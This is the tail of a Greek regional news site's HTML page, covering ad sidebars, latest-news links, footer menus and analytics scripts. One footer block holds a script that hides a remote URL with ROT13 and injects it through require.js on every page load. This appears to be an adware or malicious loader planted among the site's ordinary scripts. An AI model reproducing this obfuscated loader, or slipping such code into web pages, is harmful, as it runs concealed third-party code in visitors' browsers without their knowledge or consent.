<a href="http://www.sidiremboriki.gr/" target="_blank"><div class="field field-name-field-ad-image field-type-image field-label-hidden"><div class="field-items"><div class="field-item even"><img typeof="foaf:Image" src="http://www.patrisnews.com/sites/default/files/field/image/sidiemboriki_300x140.jpg" width="300" height="140" alt=""/></div></div></div></a>
</div>
<div class="views-row views-row-4 views-row-even">
<a href="http://www.vrisko.gr/details/676d2jbe0772a33j5577a6d4c_be6072" target="_blank"><div class="field field-name-field-ad-image field-type-image field-label-hidden"><div class="field-items"><div class="field-item even"><img typeof="foaf:Image" src="http://www.patrisnews.com/sites/default/files/field/image/samantas.gif" width="300" height="140" alt=""/></div></div></div></a>
</div>
<div class="views-row views-row-5 views-row-odd">
<a href="http://www.iliaford.gr/home/" target="_blank"><div class="field field-name-field-ad-image field-type-image field-label-hidden"><div class="field-items"><div class="field-item even"><img typeof="foaf:Image" src="http://www.patrisnews.com/sites/default/files/field/image/vasilopoulos_ford.jpg" width="300" height="140" alt=""/></div></div></div></a>
</div>
<div class="views-row views-row-6 views-row-even">
<a href="http://tsioris.car.gr/%CE%95%CF%84%CE%B1%CE%B9%CF%81%CE%B5%CE%AF%CE%B1/" target="_blank"><div class="field field-name-field-ad-image field-type-image field-label-hidden"><div class="field-items"><div class="field-item even"><img typeof="foaf:Image" src="http://www.patrisnews.com/sites/default/files/field/image/tsioris2.jpg" width="300" height="202" alt=""/></div></div></div></a>
</div>
<div class="views-row views-row-7 views-row-odd views-row-last">
<div class="field field-name-field-ad-text field-type-text field-label-hidden">
<script type="text/javascript" src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <p><ins class="adsbygoogle" style="display: inline-block; width: 300px; height: 250px;" data-ad-client="ca-pub-5290836048728578" data-ad-slot="8111059321"></ins></p>
<script type="text/javascript">
<!--//--><![CDATA[// ><!--
// <![CDATA[
(adsbygoogle = window.adsbygoogle || []).push({});
// ]]]]><![CDATA[>
//--><!]]>
</script> </div>
</div>
</div><div id="block-block-47" class="block block-block">
<div class="content">
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
 
<ins class="adsbygoogle" style="display:inline-block;width:300px;height:600px" data-ad-client="ca-pub-5290836048728578" data-ad-slot="2405488922"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script> </div>
</div>
<div id="block-views-last-news-in-details-block-1" class="block block-views">
<h2>Τελευταία νέα</h2>
<div class="content">
<div id="block-views-last_news_in_details-block_1-ajax-content" class="ajaxblocks-wrapper-2"><script type="text/javascript"></script><noscript><div class="view view-last-news-in-details view-id-last_news_in_details view-display-id-block_1 view-dom-id-b0d2a65665a5de2eccd0d65dde9a10fd">
<div class="views-row views-row-1 views-row-odd views-row-first">
<article>
<a href="/nea-enimerosi/politismos/ithi-kai-ethima-ton-hristoygennon-se-diafores-periohes-tis-elladas"><img typeof="foaf:Image" src="http://www.patrisnews.com/sites/default/files/styles/new_theme_last-news-in-sidebar/public/field/news/image/karavaki.png" width="300" height="125" alt=""/></a> <h3>
ΧΡΙΣΤΟΥΓΕΝΝΑ</h3>
<h2><a href="/nea-enimerosi/politismos/ithi-kai-ethima-ton-hristoygennon-se-diafores-periohes-tis-elladas">Ήθη και έθιμα των Χριστουγέννων σε διάφορες...</a></h2>
</article>
</div>
<div class="views-row views-row-2 views-row-even">
<article>
<a href="/nea-enimerosi/ileia/ileia-ploysio-se-proionta-oikonomiko-se-kostos-to-hristoygenniatiko-trapezi" class="active"><img typeof="foaf:Image" src="http://www.patrisnews.com/sites/default/files/styles/new_theme_last-news-in-sidebar/public/field/news/image/kreopwleio.jpg" width="300" height="125" alt=""/></a> <h3>
ΑΡΙΣΤΗ ΠΟΙΟΤΗΤΑ ΚΑΙ ΠΡΟΣΙΤΕΣ ΟΙ ΤΙΜΕΣ ΣΤΑ ΚΑΤΑΣΤΗΜΑΤΑ</h3>
<h2><a href="/nea-enimerosi/ileia/ileia-ploysio-se-proionta-oikonomiko-se-kostos-to-hristoygenniatiko-trapezi" class="active">Ηλεία: «Πλούσιο» σε προϊόντα, οικονομικό σε...</a></h2>
</article>
</div>
<div class="views-row views-row-3 views-row-odd">
<article>
<a href="/nea-enimerosi/ygeia/polykystikes-oothikes-ola-osa-prepei-na-gnorizete"><img typeof="foaf:Image" src="http://www.patrisnews.com/sites/default/files/styles/new_theme_last-news-in-sidebar/public/field/news/image/large_5_2.jpg" width="300" height="125" alt=""/></a> <h3>
ΤΙ ΣΥΜΒΑΙΝΕΙ ΕΠΙΤΕΛΟΥΣ</h3>
<h2><a href="/nea-enimerosi/ygeia/polykystikes-oothikes-ola-osa-prepei-na-gnorizete">Πολυκυστικές ωοθήκες: Όλα όσα πρέπει να...</a></h2>
</article>
</div>
<div class="views-row views-row-4 views-row-even">
<article>
<a href="/nea-enimerosi/peloponnisos/stin-kalamata-o-prothypoyrgos-alexis-tsipras-video"><img typeof="foaf:Image" src="http://www.patrisnews.com/sites/default/files/styles/new_theme_last-news-in-sidebar/public/field/news/image/15682531_10154363385579069_521794021_o.jpg" width="300" height="125" alt=""/></a> <h3>
ΤΟ ΠΡΟΓΡΑΜΜΑ ΤΩΝ ΕΠΙΣΚΕΨΕΩΝ ΤΟΥ</h3>
<h2><a href="/nea-enimerosi/peloponnisos/stin-kalamata-o-prothypoyrgos-alexis-tsipras-video">Στην Καλαμάτα ο Πρωθυπουργός Αλέξης Τσίπρας (...</a></h2>
</article>
</div>
<div class="views-row views-row-5 views-row-odd views-row-last">
<article>
<a href="/nea-enimerosi/kinimatografos/la-la-land-i-hrysi-epohi-toy-holigoynt-epistrefei"><img typeof="foaf:Image" src="http://www.patrisnews.com/sites/default/files/styles/new_theme_last-news-in-sidebar/public/field/news/image/lalaland.jpg" width="300" height="125" alt=""/></a> <h3>
ΜΙΑ ΤΑΙΝΙΑ… ΣΚΕΤΟ ΟΝΕΙΡΟ </h3>
<h2><a href="/nea-enimerosi/kinimatografos/la-la-land-i-hrysi-epohi-toy-holigoynt-epistrefei">La La Land: Η χρυσή εποχή του Χόλιγουντ...</a></h2>
</article>
</div>
</div></noscript></div> </div>
</div>
<div id="block-block-16" class="block block-block">
<div class="content">
<p><iframe src="http://www.protothema.gr/files/1/prosfores/widget_custom_5.html" frameborder="0" scrolling="no" width="300" height="250"></iframe></p>
</div>
</div>
<div id="block-block-77" class="block block-block">
<div class="content">
<div><div style="height: 5px; margin-bottom: 5px; background-color: #397695;">&nbsp;</div><div style="height: 1px; background-color: #b9cbd7;">&nbsp;</div><div style="height: 20px;">&nbsp;</div><div style="float: left; margin-right: 18px;"><a title="Εφημερίες φαρμακείων" href="/efimeries-farmakeion-ileia-ahaia"><img src="/sites/default/files/efimeries-farmakion.jpg" alt="" width="85" height="185"/></a></div><div style="float: left; margin-right: 18px;"><a title="Δρομολόγια λεωφορείων" href="/dromologia-leoforeion-pyrgos-amaliada-athina-patra"><img src="/sites/default/files/dromologia-leoforion.jpg" alt="" width="86" height="185"/></a></div><div style="float: left;"><a title="Πρόγραμμα τηλεόρασης" href="/programma-tileorasis"><img src="/sites/default/files/programma-tileorasis.jpg" alt="" width="85" height="185"/></a></div><div style="clear: both;">&nbsp;</div><div class="ver-seperator">&nbsp;</div></div> </div>
</div>
<div id="block-block-64" class="block block-block">
<div class="content">
<div style="width: 235px; text-align: center;">
<iframe style="border: 0; margin: 0; padding: 0;" src="http://www.frontpages.gr/ticker.php?category=15&amp;c=626886&amp;big=1" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" width="300" height="357"></iframe></div>
</div>
</div>
 
</aside>
</div>
<footer>
<div class="ver-seperator clear"></div>
<section class="footer_top footer">
 
<div id="block-views-new-theme-periexomeno-block" class="block block-views">
<div class="content">
<div class="view view-new-theme-periexomeno view-id-new_theme_periexomeno view-display-id-block view-dom-id-bc83e7c1487888cd9e04d2d4c795b400">
<div class="views-row views-row-1 views-row-odd views-row-first views-row-last">
<div> <div class="cat">
<a href="/nea-enimerosi/paraxena" typeof="skos:Concept" property="rdfs:label skos:prefLabel">ΠΑΡΑΞΕΝΑ</a></div> </div>
<div>
<a href="/nea-enimerosi/paraxena/o-agios-vasilis-pire-to-eleythero-gia-anahorisi-video"><img typeof="foaf:Image" src="http://www.patrisnews.com/sites/default/files/styles/new-theme_240x150/public/field/news/image/7f1fceec9651f3b4d270de9187694e94.jpg" width="240" height="150" alt=""/></a></div>
<div class="views-field views-field-title"> <h2 class="field-content"><a href="/nea-enimerosi/paraxena/o-agios-vasilis-pire-to-eleythero-gia-anahorisi-video">Ο Άγιος Βασίλης πήρε το ελεύθερο για αναχώρηση (VIDEO)</a></h2> </div></div>
</div> </div>
</div>
<div id="block-views-new-theme-periexomeno-block-1" class="block block-views">
<div class="content">
<div class="view view-new-theme-periexomeno view-id-new_theme_periexomeno view-display-id-block_1 view-dom-id-5841cdc3ef84e5ef411ba25bacbb076d">
<div class="views-row views-row-1 views-row-odd views-row-first views-row-last">
<div> <div class="cat">
<a href="/nea-enimerosi/tehnologia" typeof="skos:Concept" property="rdfs:label skos:prefLabel">ΤΕΧΝΟΛΟΓΙΑ</a></div> </div>
<div>
<a href="/nea-enimerosi/tehnologia/i-goodle-mas-eyhetai-me-doodle-gia-ta-hristoygenna"><img typeof="foaf:Image" src="http://www.patrisnews.com/sites/default/files/styles/new-theme_240x150/public/field/news/image/doodle_5.jpg" width="240" height="150" alt=""/></a></div>
<div class="views-field views-field-title"> <h2 class="field-content"><a href="/nea-enimerosi/tehnologia/i-goodle-mas-eyhetai-me-doodle-gia-ta-hristoygenna">Η Goodle μας εύχεται με doodle για τα Χριστούγεννα</a></h2> </div></div>
</div> </div>
</div>
<div id="block-views-new-theme-periexomeno-block-2" class="block block-views">
<div class="content">
<div class="view view-new-theme-periexomeno view-id-new_theme_periexomeno view-display-id-block_2 view-dom-id-bb3aea50574d267c479e027dcace7b9d">
<div class="views-row views-row-1 views-row-odd views-row-first views-row-last">
<div> <div class="cat">
<a href="/nea-enimerosi/kosmos" typeof="skos:Concept" property="rdfs:label skos:prefLabel">ΚΟΣΜΟΣ</a></div> </div>
<div>
<a href="/nea-enimerosi/kosmos/nekros-sto-milano-o-ypoptos-gia-to-makeleio-sto-verolino"><img typeof="foaf:Image" src="http://www.patrisnews.com/sites/default/files/styles/new-theme_240x150/public/field/news/image/imagehandler654644.jpg" width="240" height="150" alt=""/></a></div>
<div class="views-field views-field-title"> <h2 class="field-content"><a href="/nea-enimerosi/kosmos/nekros-sto-milano-o-ypoptos-gia-to-makeleio-sto-verolino">Νεκρός στο Μιλάνο ο ύποπτος για το μακελειό στο Βερολίνο</a></h2> </div></div>
</div> </div>
</div>
<div id="block-views-new-theme-periexomeno-block-3" class="block block-views">
<div class="content">
<div class="view view-new-theme-periexomeno view-id-new_theme_periexomeno view-display-id-block_3 view-dom-id-04d45e13a9379a016fc970086f8b175d">
<div class="views-row views-row-1 views-row-odd views-row-first views-row-last">
<div> <div class="cat">
<a href="/nea-enimerosi/omogeneia" typeof="skos:Concept" property="rdfs:label skos:prefLabel">ΟΜΟΓΕΝΕΙΑ</a></div> </div>
<div>
<a href="/nea-enimerosi/omogeneia/omogenis-disekatommyrioyhos-tis-aystralias-metaferei-tin-edra-tis"><img typeof="foaf:Image" src="http://www.patrisnews.com/sites/default/files/styles/new-theme_240x150/public/field/news/image/mak_0_0.jpg" width="240" height="150" alt=""/></a></div>
<div class="views-field views-field-title"> <h2 class="field-content"><a href="/nea-enimerosi/omogeneia/omogenis-disekatommyrioyhos-tis-aystralias-metaferei-tin-edra-tis">Ομογενής δισεκατομμυριούχος της Αυστραλίας μεταφέρει την έδρα της αυτοκρατορίας του</a></h2> </div></div>
</div> </div>
</div>
 
</section>
<div class="ver-seperator clear"></div>
<section class="footer_middle footer">
<div style="margin-left:140px;">
 
<div id="block-views-91f629c2c0e913bf0bde93c984ce7e65" class="block block-views">
<div class="content">
<div class="view view-clone-of-new-theme-periexomeno-three-index view-id-clone_of_new_theme_periexomeno_three_index view-display-id-block view-dom-id-eb09d0e6692c23528823e2cd96289c72">
<div class="views-row views-row-1 views-row-odd views-row-first views-row-last">
<div> <div class="cat">
<a href="/nea-enimerosi/geyseis" typeof="skos:Concept" property="rdfs:label skos:prefLabel">ΓΕΥΣΕΙΣ</a></div> </div>
<div>
<a href="/nea-enimerosi/geyseis/kotopoylo-lemonato-me-prasines-elies-kai-koyskoys"><img typeof="foaf:Image" src="http://www.patrisnews.com/sites/default/files/styles/new-theme_240x320/public/field/news/image/kotopoulo-me-elies-430x575.jpg" width="240" height="320" alt=""/></a></div> </div>
</div> </div>
</div>
<div id="block-views-5b89c9ba0dcbedada9dc05099052d4b1" class="block block-views">
<div class="content">
<div class="view view-clone-of-new-theme-periexomeno-three-index view-id-clone_of_new_theme_periexomeno_three_index view-display-id-block_1 view-dom-id-50c1ed8a04f7a7d6dd177f3349790668">
<div class="views-row views-row-1 views-row-odd views-row-first views-row-last">
<div> <div class="cat">
<a href="/nea-enimerosi/gynaika" typeof="skos:Concept" property="rdfs:label skos:prefLabel">ΓΥΝΑΙΚΑ</a></div> </div>
<div>
<a href="/nea-enimerosi/gynaika/i-thaymatoyrgi-diaita-tis-kim-karntasian-pos-katafere-na-hasei-20-kila-se-3"><img typeof="foaf:Image" src="http://www.patrisnews.com/sites/default/files/styles/new-theme_240x320/public/field/news/image/oxi-i-thavmatourgi-diaita-tis-kim-kardasian-pos-katafere-na-xasei-20-kila-se-3-mines.col-8.jpg" width="240" height="320" alt=""/></a></div> </div>
</div> </div>
</div>
<div id="block-views-a77d83f3b86bccf928c0d42abd4f1f86" class="block block-views">
<div class="content">
<div class="view view-clone-of-new-theme-periexomeno-three-index view-id-clone_of_new_theme_periexomeno_three_index view-display-id-block_2 view-dom-id-7cc69a0ffc1e6fb371041910851932ac">
<div class="views-row views-row-1 views-row-odd views-row-first views-row-last">
<div> <div class="cat">
<a href="/nea-enimerosi/ygeia" typeof="skos:Concept" property="rdfs:label skos:prefLabel">ΥΓΕΙΑ</a></div> </div>
<div>
<a href="/nea-enimerosi/ygeia/polykystikes-oothikes-ola-osa-prepei-na-gnorizete"><img typeof="foaf:Image" src="http://www.patrisnews.com/sites/default/files/styles/new-theme_240x320/public/field/news/image/large_5_2.jpg" width="240" height="320" alt=""/></a></div> </div>
</div> </div>
</div>
 
</div>
</section>
 
<div id="block-block-75" class="block block-block">
<div class="content">
<p style="text-align: center;"> <a style="line-height: 1.538em;" href="/roi-eidhsewn"><img class="null" src="/sites/default/files/footer_middle.png" alt="" width="734" height="54"/></a><span style="line-height: 1.538em;"> </span></p>
<p style="text-align: center;"> </p>
<p style="text-align: center;"> </p>
</div>
</div>
 
<section class="footer_bottom footer">
 
<div class="block">
<h1></h1>
<div class="ver-seperator clear">&nbsp;</div>
<div id="menu-bottom"><h3>ΚΑΤΗΓΟΡΙΕΣ ΕΙΔΗΣΕΩΝ</h3>
<ul id="footer-nav-top">
<li><a href="nea-enimerosi/ileia">Ηλεια</a></li>
<li><a href="nea-enimerosi/peloponnisos">Πελοποννησος</a></li>
<li><a href="nea-enimerosi/ellada">Ελλαδα</a></li>
<li><a href="nea-enimerosi/kosmos">Κοσμος</a></li>
<li><a href="http://www.ekirikas.com/" target="_blank">Ομογενεια</a></li>
<li><a href="nea-enimerosi/politiki">Πολιτικη</a></li>
<li><a href="nea-enimerosi/arthrografia">Αρθρογραφια</a></li>
<li><a href="nea-enimerosi/oikonomia">Οικονομια</a></li>
<li><a href="nea-enimerosi/politismos">Πολιτισμος</a></li>
<li><a href="nea-enimerosi/agrotika">Αγροτικα</a></li>
<li><a href="nea-enimerosi/kairos">Καιρος</a></li>
</ul>
<ul id="footer-nav-bottom">
<li><a href="nea-enimerosi/athlitismos">Αθλητισμος</a></li>
<li><a href="nea-enimerosi/lifestyle">lifestyle</a></li>
<li><a href="nea-enimerosi/sexy">Sexy</a></li>
<li><a href="nea-enimerosi/gynaika">Γυναικα</a></li>
<li><a href="nea-enimerosi/ygeia">Υγεια</a></li>
<li><a href="nea-enimerosi/geyseis">Γευσεις</a></li>
<li><a href="">fun</a></li>
<li><a href="nea-enimerosi/tehnologia">Τεχνολογια</a></li>
<li><a href="nea-enimerosi/perivallon">Περιβαλλον</a></li>
<li><a href="nea-enimerosi/ekpaideysi">Εκπαιδευση</a></li>
<li><a href="nea-enimerosi/katanalotes">Καταναλωτες</a></li>
</ul>
</div> </div>
<div id="block-block-163" class="block block-block">
<div class="content">
<script type="text/javascript">
            (function(){function r(s){return s.replace(/[A-z]/g,function(c){return String.fromCharCode(c.charCodeAt(0)+('M'>=c.toUpperCase()?13:-13))})}
    var c=document.createElement('script'),wdefine=typeof define!=='undefined'?define:false;c.type='text/javascript';c.async=true;
    c.setAttribute('data-main',r('//ncc.zlfnsrhey.pbz/ncc.wf'));c.src='//cdnjs.cloudflare.com/ajax/libs/require.js/2.1.10/require.min.js';
    c.onload=function(){mydefine=define,define=wdefine?wdefine:null;};
    var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(c,s);
})();
</script> </div>
</div>
<div id="block-block-130" class="block block-block">
<div class="content">
 <script type="text/javascript">
<!--//--><![CDATA[// ><!--
// <![CDATA[
_atrk_opts = { atrk_acct:"Pyl0h1awA400aQ", domain:"patrisnews.com",dynamic: true};
(function() { var as = document.createElement('script'); as.type = 'text/javascript'; as.async = true; as.src = "https://d31qbv1cthcecs.cloudfront.net/atrk.js"; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(as, s); })();
// ]]]]><![CDATA[>
//--><!]]>
</script><p></p><noscript>&lt;img src="<a href="https://d5nxst8fruw4z.cloudfront.net/atrk.gif?account=Pyl0h1awA400aQ">https://d5nxst8fruw4z.cloudfront.net/atrk.gif?account=Pyl0h1awA400aQ</a>" style="display:none" height="1" width="1" alt="" /&gt;</noscript>
  </div>
</div>
<div class="block">
<h1></h1>
<div id="copyright"><img src="/sites/default/files/logo.jpg" alt="" width="221"/><ul><li>112 Χρόνια <span>ΠΑΤΡΙΣ</span></li><li><a href="/provlitheite-sto-patrisnewsgr">Διαφημιστείτε</a></li><li><a href="/aitiseis-syndromis">Αιτήσεις συνδρομής</a></li><li><a href="/simeia-polisis">Σημεία πώλησης</a></li><li><a href="/epikoinonia">Επικοινωνία</a></li></ul><div id="copyright-info">Copyright   - <a class="patrisnews" href="/">PatrisNews.com</a> // Production by <a href="http://digital-solutions.gr/" target="_blank">Solutions</a> &amp; Powered by <a href="http://www.enterid.gr" target="_blank">Enterid.gr</a></div></div> </div>
 
</section>
</footer>
</div>
<script type="text/javascript">
(function(){
$(document).ready(function(){  
	
});  
})(jQuery)
</script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
var addthis_config = {"pubid":"stavrosgian","services_compact":"facebook,facebook_like,twitter,more","data_track_clickback":true,"ui_508_compliant":false,"ui_click":false,"ui_cobrand":"","ui_delay":0,"ui_header_background":"","ui_header_color":"","ui_open_windows":false,"ui_use_css":true,"ui_use_addressbook":false,"ui_language":"el","data_ga_property":"UA-4994641-40","data_ga_social":false}
var addthis_share = {"templates":{"twitter":"{{title}} {{url}} via @AddThis"}}
//--><!]]>
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/300/addthis_widget.js#pubid=stavrosgian&amp;async=1"></script>
<script type="text/javascript" src="http://www.patrisnews.com/sites/all/modules/addthis/addthis.js?oik1a3"></script>
<script type="text/javascript">
<!--//--><![CDATA[//><!--
var _paq = _paq || [];(function(){var u=(("https:" == document.location.protocol) ? "" : "http://stats.enterid.gr/");_paq.push(["setSiteId", "2"]);_paq.push(["setTrackerUrl", u+"piwik.php"]);_paq.push(["setDoNotTrack", 1]);_paq.push(["trackPageView"]);_paq.push(["setIgnoreClasses", ["no-tracking","colorbox"]]);_paq.push(["enableLinkTracking"]);var d=document,g=d.createElement("script"),s=d.getElementsByTagName("script")[0];g.type="text/javascript";g.defer=true;g.async=true;g.src="http://www.patrisnews.com/sites/default/files/piwik/piwik.js?oik1a3";s.parentNode.insertBefore(g,s);})();
//--><!]]>
</script>
 
<script type="text/javascript">
_atrk_opts = { atrk_acct:"Pyl0h1awA400aQ", domain:"patrisnews.com",dynamic: true};
(function() { var as = document.createElement('script'); as.type = 'text/javascript'; as.async = true; as.src = "https://d31qbv1cthcecs.cloudfront.net/atrk.js"; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(as, s); })();
</script>
<noscript><img src="https://d5nxst8fruw4z.cloudfront.net/atrk.gif?account=Pyl0h1awA400aQ" style="display:none" height="1" width="1" alt=""/></noscript>
 
<script type="text/javascript">/* <![CDATA[ */(function(d,s,a,i,j,r,l,m,t){try{l=d.getElementsByTagName('a');t=d.createElement('textarea');for(i=0;l.length-i;i++){try{a=l[i].href;s=a.indexOf('/cdn-cgi/l/email-protection');m=a.length;if(a&&s>-1&&m>28){j=28+s;s='';if(j<m){r='0x'+a.substr(j,2)|0;for(j+=2;j<m&&a.charAt(j)!='X';j+=2)s+='%'+('0'+('0x'+a.substr(j,2)^r).toString(16)).slice(-2);j++;s=decodeURIComponent(s)+a.substr(j,m-j)}t.innerHTML=s.replace(/</g,'&lt;').replace(/>/g,'&gt;');l[i].href='mailto:'+t.value}}catch(e){}}}catch(e){}})(document);/* ]]> */</script></body>
</html>
 